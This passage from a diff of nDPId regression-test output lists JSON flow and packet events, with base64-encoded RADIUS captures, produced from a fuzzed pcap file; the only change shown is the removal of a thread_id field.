"}
00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":278,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998260755,"flow_last_seen":1528998260755,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998260755,"l3_proto":"ip4","src_ip":"10.6.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":278,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998260755,"flow_last_seen":1528998260755,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998260755,"l3_proto":"ip4","src_ip":"10.6.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
01391{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1528998260755,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528998260755,"pkt":"AAAMB6xAABRO+4rqCABFAALbIUZAAP8RAAAKBkAexuIZNXIQBxQCxwAAAZYCv2ld+75N6br3Aseqn5DA044aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM2N2hbIql0ATUwMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZTAtNVctNDUtOTAtMDktNWYeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwY2Y1YWE5MjI1YiwgNWIyMmE5NWEvZTA6NWY6NDU6ZTA6MDk6NWYvMjM4BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1qBgAAAAZRBDU2TzoCAQA4AzAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjYjExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaQQAAV8gLClS8c3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAgFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQQAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVAS7YR7iU74FmJPxnRlVfzqUQ=="} 01391{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1528998260755,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528998260755,"pkt":"AAAMB6xAABRO+4rqCABFAALbIUZAAP8RAAAKBkAexuIZNXIQBxQCxwAAAZYCv2ld+75N6br3Aseqn5DA044aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM2N2hbIql0ATUwMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZTAtNVctNDUtOTAtMDktNWYeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwY2Y1YWE5MjI1YiwgNWIyMmE5NWEvZTA6NWY6NDU6ZTA6MDk6NWYvMjM4BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1qBgAAAAZRBDU2TzoCAQA4AzAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjYjExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaQQAAV8gLClS8c3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAgFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQQAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVAS7YR7iU74FmJPxnRlVfzqUQ=="}
@@ -357,70 +357,70 @@
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":279,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998260831,"flow_last_seen":1528998260831,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998260831,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.82.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":279,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998260831,"flow_last_seen":1528998260831,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998260831,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.82.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00637{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1528998260831,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528998260831,"pkt":"ABRP+4rqcNuYVcUnCABFAAClC7JAAPwRSFTG4hk1ClJAHgcUchAAkW2jC5YAiay3x5utrN9ef0\/5StJEFS4BNTAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5NWUvZTA6NWY6NDU6OTA6MDk6NWYvMjM4Tw4BAAAMVwwAAAwBf\/xQEkJeR7D8c3a4+60+qxnUicM="} 00637{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1528998260831,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528998260831,"pkt":"ABRP+4rqcNuYVcUnCABFAAClC7JAAPwRSFTG4hk1ClJAHgcUchAAkW2jC5YAiay3x5utrN9ef0\/5StJEFS4BNTAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5NWUvZTA6NWY6NDU6OTA6MDk6NWYvMjM4Tw4BAAAMVwwAAAwBf\/xQEkJeR7D8c3a4+60+qxnUicM="}
00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998260831,"flow_last_seen":1528998260831,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998260831,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.82.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998260831,"flow_last_seen":1528998260831,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998260831,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.82.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
01233{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":280,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":697,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":697,"pkt_l4_len":0,"thread_ts_msec":1528998260831,"pkt":"AAAMB6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 01219{"packet_event_id":1,"packet_event_name":"packet","packet_id":280,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":697,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":697,"pkt_l4_len":0,"thread_ts_msec":1528998260831,"pkt":"AAAMB6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00214{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":280,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528998260959} 00200{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":280,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528998260959}
00577{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":281,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":206,"pkt_type":2056,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":206,"pkt_l4_len":0,"thread_ts_msec":1528998260831,"pkt":"ABRX+4rqcNuYVcUnCAhFAADAC7dAAPwRSDTG4hk1CgxAHgcUchAArEQCA5cApOyxS9lHKp\/iE8OGfXn5m7UBNTAzMTE0ODAwODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5NWEvZTA6NWY6NDU6OTA6MDk6NWYvMjM4EiIzMjc2NCBTdWJzY3JpYmVyIG5vdCBwcm92aXNpb25lZE8HBAEABwBQEvCuKaRJ36jDL+AkcQNYHtM="} 00563{"packet_event_id":1,"packet_event_name":"packet","packet_id":281,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":206,"pkt_type":2056,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":206,"pkt_l4_len":0,"thread_ts_msec":1528998260831,"pkt":"ABRX+4rqcNuYVcUnCAhFAADAC7dAAPwRSDTG4hk1CgxAHgcUchAArEQCA5cApOyxS9lHKp\/iE8OGfXn5m7UBNTAzMTE0ODAwODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5NWEvZTA6NWY6NDU6OTA6MDk6NWYvMjM4EiIzMjc2NCBTdWJzY3JpYmVyIG5vdCBwcm92aXNpb25lZE8HBAEABwBQEvCuKaRJ36jDL+AkcQNYHtM="}
00213{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":281,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":2056,"global_ts_msec":1528998261024} 00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":281,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":2056,"global_ts_msec":1528998261024}
00586{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":282,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997663992,"flow_last_seen":1528997663992,"flow_idle_time":600000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":0,"thread_ts_msec":1528998260831,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","l4_proto":170,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00586{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":282,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997663992,"flow_last_seen":1528997663992,"flow_idle_time":600000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":0,"thread_ts_msec":1528998260831,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","l4_proto":170,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":282,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997663992,"flow_last_seen":1528997663992,"flow_idle_time":600000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":0,"thread_ts_msec":1528998260831,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","l4_proto":170,"flow_datalink":1,"flow_max_packets":3} 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":282,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997663992,"flow_last_seen":1528997663992,"flow_idle_time":600000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":0,"thread_ts_msec":1528998260831,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","l4_proto":170,"flow_datalink":1,"flow_max_packets":3}
00542{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":283,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":179,"pkt_l4_len":0,"thread_ts_msec":1528998279600,"pkt":"gBRP+yUAcNuYVcUnCABFADClC+NAAPsRSSPG4hk1CgxAHgcUchAAkf3TC5gAiaqvlSxwmtnYRSbHVUGZo3ABNTAzMTE0ODA0MzI2MDg1ODabd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5ODcvNWM6MWQ6ZDk6NTM6MGM6OWIvMjM5Tw4BAAAMFwwAAAwBf\/xQEnv5mqy\/X1rSPl3U34VdPzc="} 00528{"packet_event_id":1,"packet_event_name":"packet","packet_id":283,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":179,"pkt_l4_len":0,"thread_ts_msec":1528998279600,"pkt":"gBRP+yUAcNuYVcUnCABFADClC+NAAPsRSSPG4hk1CgxAHgcUchAAkf3TC5gAiaqvlSxwmtnYRSbHVUGZo3ABNTAzMTE0ODA0MzI2MDg1ODabd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5ODcvNWM6MWQ6ZDk6NTM6MGM6OWIvMjM5Tw4BAAAMFwwAAAwBf\/xQEnv5mqy\/X1rSPl3U34VdPzc="}
00232{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":283,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":145,"global_ts_msec":1528998279670} 00218{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":283,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":145,"global_ts_msec":1528998279670}
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":284,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998279797,"flow_last_seen":1528998279797,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528998279797,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.80.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":284,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998279797,"flow_last_seen":1528998279797,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528998279797,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.80.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
01329{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1528998279797,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":697,"pkt_l4_len":663,"thread_ts_msec":1528998279797,"pkt":"AAAMB6xAABRP+4rqCABFAAKrIUlAAP8RAAAKDEAexuJQNXIQBxQClwAAAZkCj3rtQEtjvnzCegZr\/ks\/YsIaCgAAJQAOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM3NwZbIq2HATUwMzExNDgwNDMyNjA4NTg2QHNsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TNWMtMWQtZDktNTMtMGMtOWIeJTAwLWE3LTQyLWQwLWUwLTAwOlaNcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwZDA4N2E5MjI1YiwgNWIyMmE5ODcvFWM6MWQ6ZDk6NTM6MGM6OWIvMjM5BASsFAEQIA5WWldDMlRlc3RMYWIaDPYAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TwoCAAAIFwwAABoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyCoKU3RhbmRhqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 01329{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1528998279797,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":697,"pkt_l4_len":663,"thread_ts_msec":1528998279797,"pkt":"AAAMB6xAABRP+4rqCABFAAKrIUlAAP8RAAAKDEAexuJQNXIQBxQClwAAAZkCj3rtQEtjvnzCegZr\/ks\/YsIaCgAAJQAOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM3NwZbIq2HATUwMzExNDgwNDMyNjA4NTg2QHNsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TNWMtMWQtZDktNTMtMGMtOWIeJTAwLWE3LTQyLWQwLWUwLTAwOlaNcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwZDA4N2E5MjI1YiwgNWIyMmE5ODcvFWM6MWQ6ZDk6NTM6MGM6OWIvMjM5BASsFAEQIA5WWldDMlRlc3RMYWIaDPYAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TwoCAAAIFwwAABoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyCoKU3RhbmRhqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998279797,"flow_last_seen":1528998279797,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528998279797,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.80.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998279797,"flow_last_seen":1528998279797,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528998279797,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.80.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
